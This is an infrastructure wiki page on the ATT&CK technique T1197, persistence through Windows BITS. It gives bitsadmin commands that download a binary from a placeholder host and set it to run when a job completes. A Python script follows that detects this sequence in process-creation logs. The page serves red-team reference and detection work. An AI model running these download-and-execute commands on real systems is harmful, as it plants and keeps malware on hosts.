T1197 BITS Persistence - CraigDonkin/Infrastructure GitHub Wiki

T1197: BITS Persistence

  • Abuse BITS to download and execute malicious code
  • Achieve persistence by creating a long-standing job, or by invoking a program when a job completes or errors

bitsadmin /transfer job /download /priority high [downloadlink] [download location]
bitsadmin /create persistence
bitsadmin /addfile persistence "http://x/binary.exe" "C:\location\binary.exe"
bitsadmin /SetNotifyCmdLine persistence C:\location\binary.exe NULL
bitsadmin /resume persistence
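
For detection, the command sequence above can be correlated per job name in process-creation telemetry. The following is an added example, not part of the original wiki: the function names, finding labels and sample log lines are constructed for illustration, and it assumes command lines are available from a source such as Sysmon Event ID 1 or Security event 4688 with command-line auditing.

```python
import re
import shlex
from collections import defaultdict

# Constructed process-creation command lines; not taken from a real host.
SAMPLE_CMDLINES = [
    r'bitsadmin /create persistence',
    r'bitsadmin /addfile persistence "http://x/binary.exe" "C:\location\binary.exe"',
    r'bitsadmin /SetNotifyCmdLine persistence C:\location\binary.exe NULL',
    r'bitsadmin /resume persistence',
    r'bitsadmin.exe /create updater',
    r'bitsadmin.exe /addfile updater "https://example.test/patch.msu" "C:\Temp\patch.msu"',
    r'BITSADMIN /TRANSFER job /download /priority high http://x/a.bin C:\Temp\a.bin',
    r'ipconfig /all',
]

def _tokens(cmdline):
    # posix=False keeps backslashes in Windows paths; strip surrounding quotes.
    try:
        return [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    except ValueError:  # unbalanced quote: fall back to whitespace split
        return cmdline.split()

def analyze(cmdlines):
    """Correlate bitsadmin invocations per job name and return findings."""
    jobs = defaultdict(lambda: {"urls": [], "notify": None, "resumed": False})
    findings = []
    for line in cmdlines:
        tok = _tokens(line)
        if len(tok) < 3 or not re.fullmatch(r'(.*\\)?bitsadmin(\.exe)?', tok[0], re.I):
            continue
        switch, job = tok[1].lower(), tok[2]  # bitsadmin switches are case-insensitive
        if switch == "/transfer":
            findings.append(("transfer", job, line))
        elif switch == "/addfile" and len(tok) >= 5:
            jobs[job]["urls"].append(tok[3])
        elif switch == "/setnotifycmdline" and len(tok) >= 4:
            # A program name of NULL clears the callback, so it is not a hit.
            jobs[job]["notify"] = None if tok[3].upper() == "NULL" else tok[3]
        elif switch == "/resume":
            jobs[job]["resumed"] = True
    for job, st in jobs.items():
        if st["notify"]:
            kind = "notify-cmd-active" if st["resumed"] else "notify-cmd-set"
            findings.append((kind, job, st["notify"]))
    return findings

if __name__ == "__main__":
    for finding in analyze(SAMPLE_CMDLINES):
        print(finding)
```

The `updater` job in the sample has no notify command and produces no finding, which is the benign baseline to tune against.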

Resources

https://mgreen27.github.io/posts/2018/02/18/Sharing_my_BITS.html

https://www.secureworks.com/blog/malware-lingers-with-bits
